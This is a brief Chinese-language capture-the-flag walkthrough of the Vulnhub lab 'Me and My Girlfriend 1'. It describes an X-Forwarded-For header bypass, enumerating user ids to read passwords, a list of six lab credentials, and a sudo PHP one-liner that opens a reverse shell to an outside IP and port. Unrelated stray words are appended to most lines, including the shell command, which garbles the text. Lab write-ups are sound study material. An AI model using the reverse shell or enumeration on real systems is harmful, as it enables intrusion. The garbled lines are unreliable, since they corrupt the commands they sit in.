Girlfreind:1 Vulnhub Walkthrough

靶機連接:php

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/web

主機掃描:ssh

 

HTTP 目錄訪問,提示無權限,右鍵源碼,提示XXF便可3d

 

正常訪問,註冊一個用戶,登陸,而後查看用戶profile,經過id進行遍歷枚舉用戶密碼blog

 

eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty!!!
abdikasepak dorrrrr
sundatea indONEsia
alice 4lic3
pentest pentest源碼

經過注意登陸web,無發現上傳的點test

而後經過ssh嘗試登陸登錄

 

提權操做sed

sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'date

 

 

OVER !!

相關文章
相關標籤/搜索